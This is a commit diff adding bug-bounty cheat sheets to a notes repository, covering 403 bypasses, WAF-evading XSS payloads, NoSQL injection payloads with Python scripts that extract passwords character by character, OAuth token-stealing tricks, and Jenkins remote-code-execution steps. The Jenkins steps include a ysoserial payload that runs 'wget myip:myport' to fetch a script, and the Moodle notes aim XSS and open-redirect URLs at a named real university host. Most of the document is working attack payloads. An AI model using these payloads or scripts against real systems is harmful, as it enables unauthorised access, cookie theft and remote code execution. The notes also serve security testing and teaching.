STRLCPY/AllAboutBugBounty

■ ■ ■ ■ ■ ■

Bypass/Bypass 403.md

1	1		# 403 Forbidden Bypass
2	2
	3	+	## Tools
	4	+
	5	+	* [Bypass-403 \| Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
	6	+
	7	+
	8	+	## Exploit
3	9		1. Using "X-Original-URL" header
4	10		```
5	11		GET /admin HTTP/1.1
		skipped 15 lines
21	27		http://target.com/%2e/admin => 200
22	28		```
23	29
24		-	3. Try add dot (.) and slash (/) in the URL
	30	+	3. Try add dot (.) slash (/) and semicolon (;) in the URL
25	31		```
26	32		http://target.com/admin => 403
27	33		```
28	34		Try this to bypass
29	35		```
30		-	http://target.com/admin/. => 200
31		-	http://target.com//admin// => 200
32		-	http://target.com/./admin/./ => 200
	36	+	http://target.com/secret/. => 200
	37	+	http://target.com//secret// => 200
	38	+	http://target.com/./secret/.. => 200
	39	+	http://target.com/;/secret => 200
	40	+	http://target.com/.;/secret => 200
	41	+	http://target.com//;//secret => 200
33	42		```
34	43
35	44		4. Add "..;/" after the directory name
		skipped 22 lines
58	67		X-Original-URL: /admin
59	68		```
60	69
61		-	Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
	70	+	Source:
	71	+	- [@iam_j0ker](https://twitter.com/iam_j0ker)
	72	+	- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
62	73

■ ■ ■ ■ ■ ■

Cross Site Scripting.md

		skipped 335 lines
336	336		<!--><svg onload=alert(1)-->
337	337		```
338	338
	339	+	## Bypass WAF
	340	+	1. Cloudflare
	341	+	```
	342	+	<svg%0Aonauxclick=0;[1].some(confirm)//
	343	+
	344	+	<svg onload=alert%26%230000000040"")>
	345	+
	346	+	<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;(a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1))>
	347	+	<svg onx=() onload=(confirm)(1)>
	348	+
	349	+	<svg onx=() onload=(confirm)(document.cookie)>
	350	+
	351	+	<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
	352	+
	353	+	Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
	354	+
	355	+	"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
	356	+
	357	+	Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
	358	+
	359	+	"><onx=[] onmouseover=prompt(1)>
	360	+
	361	+	%2sscript%2ualert()%2s/script%2u -xss popup
	362	+
	363	+	<svg onload=alert%26%230000000040"1")>
	364	+
	365	+	"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"//Onx=""//onfocus=prompt(1)>"//Onx=""//%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
	366	+
	367	+	[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
	368	+
	369	+	<svg onload=prompt%26%230000000040document.domain)>
	370	+
	371	+	<svg onload=prompt%26%23x000000028;document.domain)>
	372	+
	373	+	<svg/onrandom=random onload=confirm(1)>
	374	+
	375	+	<video onnull=null onmouseover=confirm(1)>
	376	+
	377	+	<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
	378	+
	379	+	:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
	380	+
	381	+	<img ignored=() src=x onerror=prompt(1)>
	382	+	```
	383	+
339	384		Reference:
340	385		- [Brute Logic](https://brutelogic.com.br/)

■ ■ ■ ■ ■ ■

Misc/Broken Link Hijacking.md

1	1		# Broken Link Hijacking
2		-	## Introduction
3		-	Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
4	2
5		-	## How to Find
6		-	1. Manually find external links on the target site (For example, check some links to social media accounts)
7		-	2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
	3	+	## Tools
	4	+	- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
8	5
9		-	```
10		-	blc -rof --filter-level 3 https://vuln.com/
11		-	```
	6	+	## Definition
	7	+	Broken Link Hijacking exists whenever a target links to an expired domain or page
	8	+
	9	+	## How to find
	10	+	1. Manually find external links on the target site (For example, check some links to social media accounts)
	11	+	2. Try using tools to find broken link, for example using tools that listed in this readme
12	12
13	13		References:
14	14		- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
		skipped 2 lines

■ ■ ■ ■ ■ ■

Misc/Exposed API keys.md

1	+	# Exposed API Keys
2	+
3	+	## Tools
4	+	* [Key-Checker](https://github.com/daffainfo/Key-Checker)
5	+
6	+	## Definition
7	+	Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
8	+
9	+	## How to exploit
10	+	[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys

■ ■ ■ ■ ■ ■ ■

NoSQL Injection.md

1		-	# Soon!
	1	+	## NoSQL injection
	2	+
	3	+	## Tools
	4	+
	5	+	* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
	6	+
	7	+	## Exploit
	8	+
	9	+	### Authentication Bypass
	10	+
	11	+	Basic authentication bypass using not equal ($ne) or greater ($gt)
	12	+
	13	+	```
	14	+	in the request
	15	+	- username[$ne]=toto&password[$ne]=toto
	16	+	- login[$regex]=a.*&pass[$ne]=lol
	17	+	- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
	18	+	- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
	19	+	```
	20	+
	21	+	```json
	22	+	The output is
	23	+	{"username": {"$ne": null}, "password": {"$ne": null}}
	24	+	{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
	25	+	{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
	26	+	{"username": {"$gt":""}, "password": {"$gt":""}}
	27	+	```
	28	+
	29	+	### Extract length information
	30	+
	31	+	```json
	32	+	username[$ne]=toto&password[$regex]=.{1}
	33	+	username[$ne]=toto&password[$regex]=.{3}
	34	+	```
	35	+
	36	+	### Extract data information
	37	+
	38	+	```json
	39	+	in URL
	40	+	username[$ne]=toto&password[$regex]=m.{2}
	41	+	username[$ne]=toto&password[$regex]=md.{1}
	42	+	username[$ne]=toto&password[$regex]=mdp
	43	+
	44	+	username[$ne]=toto&password[$regex]=m.*
	45	+	username[$ne]=toto&password[$regex]=md.*
	46	+
	47	+	in JSON
	48	+	{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
	49	+	{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
	50	+	{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
	51	+	```
	52	+
	53	+	### Extract data with "in"
	54	+
	55	+	```json
	56	+	{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
	57	+	```
	58	+
	59	+	### PHP Arbitrary Function Execution
	60	+	```json
	61	+	"user":{"$func": "var_dump"}
	62	+	```
	63	+
	64	+	## Blind NoSQL
	65	+
	66	+	### POST
	67	+
	68	+	```python
	69	+	import requests
	70	+	import urllib3
	71	+	import string
	72	+	import urllib
	73	+	urllib3.disable_warnings()
	74	+
	75	+	username="admin"
	76	+	password=""
	77	+	u="http://example.org/login"
	78	+	headers={'content-type': 'application/json'}
	79	+
	80	+	while True:
	81	+	for c in string.printable:
	82	+	if c not in ['*','+','.','?','\|']:
	83	+	payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
	84	+	r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
	85	+	if 'OK' in r.text or r.status_code == 302:
	86	+	print("Found one more char : %s" % (password+c))
	87	+	password += c
	88	+	```
	89	+
	90	+	### GET
	91	+
	92	+	```python
	93	+	import requests
	94	+	import urllib3
	95	+	import string
	96	+	import urllib
	97	+	urllib3.disable_warnings()
	98	+
	99	+	username='admin'
	100	+	password=''
	101	+	u='http://example.org/login'
	102	+
	103	+	while True:
	104	+	for c in string.printable:
	105	+	if c not in ['*','+','.','?','\|', '#', '&', '$']:
	106	+	payload='?username=%s&password[$regex]=^%s' % (username, password + c)
	107	+	r = requests.get(u + payload)
	108	+	if 'Yeah' in r.text:
	109	+	print("Found one more char : %s" % (password+c))
	110	+	password += c
	111	+	```
	112	+
	113	+	Another example using sleep to check vuln or not
	114	+	```
	115	+	'%2bsleep(1)%2b'
	116	+	```
	117	+
	118	+	### MongoDB Payloads
	119	+
	120	+	```bash
	121	+	true, $where: '1 == 1'
	122	+	, $where: '1 == 1'
	123	+	$where: '1 == 1'
	124	+	', $where: '1 == 1'
	125	+	1, $where: '1 == 1'
	126	+	{ $ne: 1 }
	127	+	', $or: [ {}, { 'a':'a
	128	+	' } ], $comment:'successful MongoDB injection'
	129	+	db.injection.insert({success:1});
	130	+	db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
	131	+	\|\| 1==1
	132	+	' && this.password.match(/.*/)//+%00
	133	+	' && this.passwordzz.match(/.*/)//+%00
	134	+	'%20%26%26%20this.password.match(/.*/)//+%00
	135	+	'%20%26%26%20this.passwordzz.match(/.*/)//+%00
	136	+	{$gt: ''}
	137	+	[$ne]=1
	138	+	```
	139	+
	140	+	## References
	141	+
	142	+	* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
	143	+	* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)

■ ■ ■ ■ ■ ■

OAuth Misconfiguration.md

1	+	# OAuth Misconfiguration
2	+	1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
3	+	2. Change Referral header to attacker(.)com while requesting OAuth.
4	+	3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
5	+	4. OAuth Token Re-use.
6	+	5. Missing or broken state parameter.
7	+	6. Lack of origin check.
8	+	7. Open Redirection on another endpoint > Use it in redirect_uri
9	+	8. If there is an email parameter after signin then try to change the email parameter to victim's one.
10	+	9. Try to remove email from the scope and add victim's email manually.
11	+	10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
12	+	11. Check if its leaking client_secret parameter.
13	+	12. Go to the browser history and check if the token is there.

■ ■ ■ ■ ■ ■

README.md

1	1		# All about bug bounty
2	2		These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
3	3
	4	+	![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
	5	+	![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
	6	+	![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
	7	+	![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
	8	+
4	9		## List
5	10		- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
6		-	- SQL Injection (SOON)
7		-	- NoSQL Injection (SOON)
8		-	- Local File Inclusion (SOON)
9	11		- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
10	12		- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
11		-	- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
12		-	- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
13	13		- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
14	14		- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
15	15		- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
	16	+	- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
	17	+	- Local File Inclusion (SOON)
	18	+	- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
	19	+	- SQL Injection (SOON)
	20	+	- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
	21	+	- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
16	22		- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
17	23
18	24		## List Bypass
		skipped 9 lines
28	34
29	35		## List Framework
30	36		- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
31		-	- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
	37	+	- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
32	38
33	39		## Miscellaneous
34	40		- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
		skipped 3 lines
38	44		- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
39	45		- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
40	46		- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
41		-	- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
	47	+
	48	+	## Technologies
	49	+	- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
	50	+	- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
	51	+	- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
42	52
43	53		## Reconnaissance
44	54		- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
		skipped 6 lines

■ ■ ■ ■ ■ ■

Technologies/Jenkins.md

1	+	## Jenkins
2	+	1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
3	+
4	+	Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
5	+	Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
6	+
7	+	```bash
8	+	java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
9	+	./jenkins_rce.py jenkins_ip jenkins_port payload.out
10	+	```
11	+
12	+	2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
13	+
14	+	Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
15	+
16	+	If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
17	+	```bash
18	+	curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
19	+	```
20	+
21	+	3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
22	+
23	+	Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
24	+
25	+	Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
26	+
27	+	4. CVE-2019-1003030
28	+
29	+	How to Exploit:
30	+	- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
31	+
32	+	```
33	+	GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
34	+	public x(){
35	+	"ping -c 1 xx.xx.xx.xx".execute()
36	+	}
37	+	} HTTP/1.1
38	+	Host: 127.0.0.1
39	+	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
40	+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
41	+	Accept-Language: en-US,en;q=0.5
42	+	Accept-Encoding: gzip, deflate
43	+	Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
44	+	Connection: close
45	+	Upgrade-Insecure-Requests: 1
46	+	```
47	+	URL Encoding the following for RCE
48	+	```
49	+	public class x {
50	+	public x(){
51	+	"ping -c 1 xx.xx.xx.xx".execute()
52	+	}
53	+	}
54	+	```
55	+	to
56	+
57	+	%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
58	+
59	+	5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
60	+
61	+	How to exploit:
62	+	- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
63	+	- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
64	+
65	+	Reference:
66	+	- https://github.com/gquere/pwn_jenkins

■ ■ ■ ■ ■ ■

Misc/Unauthenticated Jira CVE.md Technologies/Jira.md

		skipped 59 lines
60	60		```
61	61		https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
62	62		```
	63	+
	64	+	Reference:
	65	+	- https://twitter.com/harshbothra

■ ■ ■ ■ ■ ■

Technologies/Moodle.md

1	+	# Moodle
2	+
3	+	1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
4	+	```
5	+	https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
6	+	```
7	+
8	+	2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
9	+
10	+	```
11	+	https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
12	+	```

Major Update, adding some tips